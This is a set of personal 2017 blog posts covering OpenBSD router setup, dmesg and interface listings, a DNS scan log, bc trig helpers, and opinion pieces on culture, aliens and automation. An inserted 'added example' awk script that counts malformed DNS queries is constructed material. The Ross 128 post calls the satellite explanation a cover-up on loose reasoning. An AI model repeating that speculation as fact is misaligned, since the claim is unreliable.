    When I grew up, I immersed myself around American culture. Hip-Hop. It was the thing and as a youth living in Canada it was thrilling. However I'm a little stunned why America is seemingly falling. Is it that entertainment has corrupted the driving force behind America's momentum? I personally had a second chance in life, not many people have that, but it is maybe worth exploring the "be all you can be" and I don't mean joining the army but striving for personal best.

    You don't have to be rich, you don't have to be the smartest, but when you're trying to stay away from intoxicants, trying for realisable goals then trying is worth the effort. Eventually people have to figure out that doing X is not going to raise them, it may be a wrong way to seek personal freedom. Wow, now that I started this article I realise how hard it is to write. I'm not going to tell you to seek god, or stay away from drugs. You know the answer deep down in your heart anyhow. But seek yourself.

    I could tell you all the things that are wrong with American society, but what can I tell you about what's great? There is a lot. Hip Hop music is great, but you had to find the great moments. Hip Hop often prepared people not to be sarcastic on their surroundings but to cope with difficult times. Seek your strength, you have it. I can't tell you any hip hop artists to listen to, I personally get a lot of strength from 2pac remakes these days, but I'm going to leave you with one of my favourite statements that I want to pass to people looking for a way... "You gotta go in, to get out".

    I guess what that means is seek your soul, and once you've found it escape the situation that's making you uncomfortable. It's within you, and not to be found in the stars. Once you know yourself the stars aren't so distant, you know.



    Brainstorm why aliens haven't been found yet

    July 18th, 2017

    1. As the number one reason I think aliens haven't been found yet is because they are in the process of conquest and don't go looking for us until they are ready to take us in.
    2. We're not really a wise species, we're quick to draw conclusions, we are a conflict species, we like war and destruction.. all the reason to stay away from us
    3. Either aliens are superior to us, at which point they grant us freedom, or they are inferior to us at which point they are in hiding from us.
    4. Perhaps radio signals are not the right way to communicate, it bears dangers

    Then there may also be a reason that we don't need aliens in our leaders' views. We're so corrupt in our own resources that we don't want others to come along. This is a human trait. Maybe it's more about us than it is about them.



    Provided a patch to OpenBSD ifconfig(8)

    July 19th, 2017

    After a lot of monkeying around on my router venus which had its pflow interface crippled by the config, I produced this patch:

    Basically we're not trying to resolve the flowsrc or flowdst, so I added a flag to the resolver to treat this as a raw IP or IPv6.



    Difficulties in recruiting ICT specialists reported in the EU

    July 19th, 2017

    In this document Eurostat shows that 41% of enterprises reported vacancies. Those positions can be filled, if these enterprises made in-roads and changed their systems, is my idea on this. I.e. a business traditionally hiring Windows specialists should know that there is a large Linux following that exists and if they changed their systems to incorporate Linux programs they would have better chances at filling the vacancy. This is just my observation. Here in Schweinfurt there are 100 jobs vacant. It's always been 100 jobs, for as long as I looked. Half of those are probably fake-jobs, the other half are often specialised jobs around Windows. I know my own frustration at finding the right job there. Recently I applied to a Linux job. I'm keeping my fingers crossed.



    Purchased a used Ubiquiti Edgerouter

    July 22nd, 2017

    I purchased a used Edgerouter from someone on IRC. Before I made the deal I asked on the openbsd-misc mailing list and it seems I got people on a good day:

    The Edgerouter ER-8 is supported, thank goodness. Apparently the ER-8 costs 289 EUR new and I got it for 180 EUR. Hopefully it's in good condition.



    Newly planned network at home

    July 23rd, 2017

    With zeta my new OpenBSD firewall that I'll probably get by Wednesday I have simplified my network a little. From the start zeta will use 7 ports which is amazing. Here is what area52 which is what I call my apartment will look like:

    Network map (2017-07-23):
    
    [gaia]--                                    Fritzbox LTE (to LTE network)
              \                                       |
    [phone1] - \                                      |
                --- [uranus] === [Access Point] --- [zeta] ---- to pppoe cloud
    [phone2] - /                                      |
              /                                       +---[mercury]
    [beta]--                                          |
                                                      +---[AREA52U WR-1043v4]
                                                      |
                                                      +---[AREA52U B.A.T.M.A.N.]
                                                      |
                              saturn --------------[venus]----[spica]
                                                      |
                                                      +--[Apple TV]
    [Freifunk wr-841v10 2.4GHz]                       |
    [Freifunk wr-841v10 2.4GHz]                       |
                                                      +--[Samsung TV]
                                                      |
                                                      +--[saturn]
                                                      |
                                               [freifunk wr-841v8]
    
    Legend:                         Hosts:
    
    --- CAT5 cabling                spica: apple computers running vmware
    === wifi 5 Ghz                  uranus: OpenBSD i386 behind Fritz!Repeater
    |   CAT5 cabling                venus: OpenBSD amd64 on Soekris hw
                                    zeta: OpenBSD octeon ER-8 firewall
                                    fritzbox: AVM fritzbox router
                                    earth, mercury + beta: OpenBSD hosts
    
    End of Network map.
    
    I'm doing a lot more cabling and vlan'ing instead of vxlan'ing which is routed. With that I'm hoping to gain back stability and robustness.



    Puzzled by the Ross 128 story

    July 23rd, 2017

    In this article at SoylentNews the scientists at Arecibo are blaming geostationary satellites for the Ross 128 signals. However I'm puzzled by this. For one the dish at Arecibo is not very movable, in fact it's 100% immovable and the science done on it is pretty much outbound 90 degrees from the flat earth. Sure they can perhaps move the receiver by 5% or so... This means that the geostationary satellites are always in view of the Arecibo dish, and if that's the case they surely must have detected the geostationary satellites earlier. Why is this even news then? I think something fishy may be going on. It smells like a cover-up.



    Dmesg from zeta.centroid.eu

    July 27th, 2017

    Zeta is my new firewall/router at home. It's slower than the APU1 that I had in its place before but it gave a lot more ports (+5) so I'm very happy about that. Also it's a MIPS64 which should keep the footprint of crackers lower that would be able to break into this host which is a plus.

    Copyright (c) 1982, 1986, 1989, 1991, 1993
    	The Regents of the University of California.  All rights reserved.
    Copyright (c) 1995-2017 OpenBSD. All rights reserved.  https://www.OpenBSD.org
    
    OpenBSD 6.1-current (GENERIC.MP) #0: Sat Jul 22 21:28:07 UTC 2017
        visa@octeon:/usr/src/sys/arch/octeon/compile/GENERIC.MP
    real mem = 2147483648 (2048MB)
    avail mem = 2113355776 (2015MB)
    mainbus0 at root
    cpu0 at mainbus0: CN61xx CPU rev 0.1 800 MHz, Software FP emulation
    cpu0: cache L1-I 512KB D 8KB 64 way, L2 1024KB 8 way
    cpu1 at mainbus0: CN61xx CPU rev 0.1 800 MHz, Software FP emulation
    cpu1: cache L1-I 512KB D 8KB 64 way, L2 1024KB 8 way
    clock0 at mainbus0: int 5
    iobus0 at mainbus0
    simplebus0 at iobus0: "soc"
    octciu0 at simplebus0
    cn30xxsmi0 at simplebus0
    cn30xxsmi1 at simplebus0
    com0 at simplebus0: ns16550a, 64 byte fifo
    com0: console
    com1 at simplebus0: ns16550a, 64 byte fifo
    octmmc0 at simplebus0
    sdmmc0 at octmmc0: 8-bit, mmc high-speed
    octuctl0 at iobus0 base 0x118006f000000 irq 56
    ehci0 at octuctl0
    usb0 at ehci0: USB revision 2.0
    uhub0 at usb0 configuration 1 interface 0 "Octeon EHCI root hub" rev 2.00/1.00 addr 1
    ohci0 at octuctl0, version 1.0
    usb1 at ohci0: USB revision 1.0
    uhub1 at usb1 configuration 1 interface 0 "Octeon OHCI root hub" rev 1.00/1.00 addr 1
    octrng0 at iobus0 base 0x1400000000000 irq 0
    cn30xxgmx0 at iobus0 base 0x1180008000000
    cnmac0 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:12
    ukphy0 at cnmac0 phy 4: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac1 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:13
    ukphy1 at cnmac1 phy 5: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac2 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:14
    ukphy2 at cnmac2 phy 6: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac3 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:15
    ukphy3 at cnmac3 phy 7: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cn30xxgmx1 at iobus0 base 0x1180010000000
    cnmac4 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:16
    ukphy4 at cnmac4 phy 0: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac5 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:17
    ukphy5 at cnmac5 phy 1: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac6 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:18
    ukphy6 at cnmac6 phy 2: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    cnmac7 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:19
    ukphy7 at cnmac7 phy 3: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
    /dev/ksyms: Symbol table not valid.
    umass0 at uhub0 port 1 configuration 1 interface 0 "SanDisk Ultra USB 3.0" rev 2.10/1.00 addr 2
    umass0: using SCSI over Bulk-Only
    scsibus0 at umass0: 2 targets, initiator 0
    sd0 at scsibus0 targ 1 lun 0:  SCSI4 0/direct removable \
    serial.07815591241023103380
    sd0: 118464MB, 512 bytes/sector, 242614272 sectors
    scsibus1 at sdmmc0: 2 targets, initiator 0
    sd1 at scsibus1 targ 1 lun 0:  SCSI2 0/direct removable
    sd1: 3776MB, 512 bytes/sector, 7733248 sectors
    vscsi0 at root
    scsibus2 at vscsi0: 256 targets
    softraid0 at root
    scsibus3 at softraid0: 256 targets
    boot device: sd0
    root on sd0a (08e1253cf19e0676.a) swap on sd0b dump on sd0b
    WARNING: No TOD clock, believing file system.
    WARNING: CHECK AND RESET THE DATE!
    cpu1 launched
    
    I have given it a 128 GB USB stick as its disk even though the internal flash card is detected as sd1. The people involved in this architecture are super! They really should be congratulated to make this architecture happen. I did have some problems with threaded programs on this firewall but I moved those to my amd64 router venus (the program was BIND 9.10.5)... Here is the listing of ports, I have utilized all eight:
    cnmac0: flags=8843 mtu 1500
            lladdr 24:a4:3c:06:9f:12
            description: eth4 - FritzBox LTE
            index 1 priority 0 llprio 3
            media: Ethernet autoselect (100baseTX full-duplex)
            status: active
            inet 192.168.78.1 netmask 0xffffff00 broadcast 192.168.78.255
    cnmac1: flags=8843 mtu 1526
            lladdr 24:a4:3c:06:9f:13
            description: eth5 - Telekom VDSL
            index 2 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
            inet 192.168.16.1 netmask 0xffffff00 broadcast 192.168.16.255
    cnmac2: flags=8b43 mtu 1500
            lladdr 24:a4:3c:06:9f:14
            description: eth6 - mercury
            index 3 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
            inet 192.168.70.1 netmask 0xffffff00 broadcast 192.168.70.255
            inet6 fe80::26a4:3cff:fe06:9f14%cnmac2 prefixlen 64 scopeid 0x3
            inet6 2001:db8::121 prefixlen 64
    cnmac3: flags=8b43 mtu 1500
            lladdr 24:a4:3c:06:9f:15
            description: eth7 - venus
            index 4 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
            inet 192.168.42.1 netmask 0xffffff00 broadcast 192.168.42.255
    cnmac4: flags=8843 mtu 1500
            lladdr 24:a4:3c:06:9f:16
            description: eth0 - Access Point to uranus
            index 5 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
            inet 192.168.179.1 netmask 0xffffff00 broadcast 192.168.179.255
            inet6 fe80::26a4:3cff:fe06:9f16%cnmac4 prefixlen 64 scopeid 0x5
            inet6 2001:db8:0:10::111 prefixlen 64
    cnmac5: flags=8843 mtu 1500
            lladdr 24:a4:3c:06:9f:17
            description: eth1 - AREA52U uplink
            index 6 priority 0 llprio 3
            media: Ethernet autoselect (100baseTX full-duplex)
            status: active
            inet 192.168.43.1 netmask 0xffffff00 broadcast 192.168.43.255
    cnmac6: flags=8b43 rdomain 2 mtu 1500
            lladdr 24:a4:3c:06:9f:18
            description: eth2 - AREA52U host from bridge
            index 7 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
    cnmac7: flags=8b43 rdomain 3 mtu 1500
            lladdr 24:a4:3c:06:9f:19
            description: eth3 - AREA52U B.A.T.M.A.N.
            index 8 priority 0 llprio 3
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
    
    Notice the order between cnmac0 and eth0 differs, hence I have labeled the ports. There also exist some vlans and bridges that I bridge batman and other stuff together and pass it on to venus or mercury. Cheers!



    Finished the story of Goldflipper

    July 29th, 2017

    Check it out here.



    The private space race

    July 30th, 2017

    Most rich people don't get rich in a vacuum. They employ people to make their money. Well all that is gonna change with artificial intelligence and robots. There might be 10% employees of what they used to employ, in the near future. The rest will be laid off. Those 10% will be high technologists who work on fixing the robots and computer systems. The hard work will be conducted by robots.

    When people are ready to leave earth it will likely be the rich. They'll settle on the moon, they'll settle mars and they'll mine the asteroid belt, with you guessed it, robots. So nothing has changed except that living on mars makes you instantly poor unless you have high technology to help you get the resources that a human being needs.

    What's going to happen to the poor people on earth? We'll be living in ghettos most likely, bunched together in big cities like sardines with promises of being picked in a lottery to go to space. We'll be monitored 24/7 in our 80 square meter apartments and medicated when there is the slightest hint of depression. When people get drift that the rich are using all the resources to get off this planet and leaving us behind there'll be chaos.

    We have to think about whether this is the future we want. Because this is what's happening. We are the people farms. What is a worthwhile pastime when AI outsmarts us? What is a worthwhile profession when robots outdo us? Do you think we'll all end up playing tennis and bone each other 24/7? Get. Real. I'm majorly pissed off really, not because I don't get to go to the moon, no, because there is no meaningful work that I can pursue that isn't already done by a machine.

    A 2 class system will erupt, us and them and it's all lies and trickery. The movies 2001 Space Odyssey and Terminator are not warning signs, we've already passed them. They are here.



    I tip my hat to SHA2017

    August 06th, 2017

    This morning a hacker scanned my delphinusdnsd server from SHA2017, why?

    Aug  6 05:06:45 chi delphinusdnsd[38628]: on descriptor 11 interface  \
    "78.47.14.22" header from 151.216.93.11 has no question, drop
    Aug  6 05:06:45 chi delphinusdnsd[38628]: question on descriptor 11 \
    interface "78.47.14.22" from 151.216.93.11, did not have question of 1 \
    replying format error
    
    Sorry about the incomplete log. I don't have much traffic so I watch the log. The IP in question is dns for the sha2017.camp. domain.
    ;; QUESTION SECTION:
    ;11.93.216.151.in-addr.arpa.    IN      PTR
    
    ;; AUTHORITY SECTION:
    93.216.151.in-addr.arpa. 600    IN      SOA     ns1.sha2017.camp. \ 
    root.sha2017.camp. 2016121900 10800 3600 604800 3600
    
    Just to let hackers know. I'm not rich. I don't have connections. So you're not exactly a Robin Hood if you're hacking me. SHA2017 conference's home page is found here.
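The two delphinusdnsd messages quoted above can be counted per source address instead of being read by eye. This added example (not part of delphinusdnsd or of the original post) does that with awk; the first two sample lines are the post's own log lines with the backslash wraps joined, and the 192.0.2.7 and sshd lines are constructed for the example.

```shell
#!/bin/sh
# Added example: tally questionless and format-error queries per source
# address from delphinusdnsd syslog lines.

# Sample input. Lines 1-2 are the post's log lines with the "\" wraps
# joined; the 192.0.2.7 lines and the sshd line are constructed.
sample_log() {
    cat <<'EOF'
Aug  6 05:06:45 chi delphinusdnsd[38628]: on descriptor 11 interface "78.47.14.22" header from 151.216.93.11 has no question, drop
Aug  6 05:06:45 chi delphinusdnsd[38628]: question on descriptor 11 interface "78.47.14.22" from 151.216.93.11, did not have question of 1 replying format error
Aug  6 05:09:02 chi delphinusdnsd[38628]: on descriptor 11 interface "78.47.14.22" header from 192.0.2.7 has no question, drop
Aug  6 05:09:03 chi delphinusdnsd[38628]: on descriptor 11 interface "78.47.14.22" header from 192.0.2.7 has no question, drop
Aug  6 05:10:00 chi sshd[4111]: Connection closed by 192.0.2.7 port 50000
EOF
}

# Reads syslog on stdin, prints "<source> <kind> <count>" sorted by source.
# kind is "drop" for headers without a question and "formerr" for queries
# answered with a format error.
malformed_by_source() {
    awk '
    /delphinusdnsd\[/ && (/has no question, drop/ || /replying format error/) {
        for (i = 1; i < NF; i++) {
            if ($i == "from") {
                src = $(i + 1)
                sub(/,$/, "", src)      # "from 151.216.93.11," in line 2
                kind = ($0 ~ /has no question/) ? "drop" : "formerr"
                count[src " " kind]++
                break
            }
        }
    }
    END { for (k in count) print k, count[k] }
    ' | LC_ALL=C sort
}

# Stand-alone run: summarise the embedded sample.
sample_log | malformed_by_source
```

To use it on a live system, pipe the daemon's log file into `malformed_by_source` in place of `sample_log`.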



    SOHCAHTOA.bc

    August 7th, 2017

    I have made a helper define, with the help of #openbsd on efnet, on SOHCAHTOA functions. In order to solve this problem, I use the following defines with bc:

    define soh(o, h) {
            return (r2d(as(o/h)))
    }
    
    define cah(a, h) {
            return (r2d(ac(a/h)))
    }
    
    define toa(o, a) {
            return (r2d(a(o/a)))
    }
    
    define as(x) {
           return a(x / sqrt(1 - x^2))
    }
    
    define ac(x) {
            return a(sqrt(1 - x^2) / x)
    }
    
    define r2d(x) {
            return (x * 180/(4 * a(1)))
    }
    
    define d2r(x) {
            return (x * ((2 * a(2^10000)) / 180))
    }
    
    So then...I calculate:
    beta$ bc -l sohcahtoa.bc
    t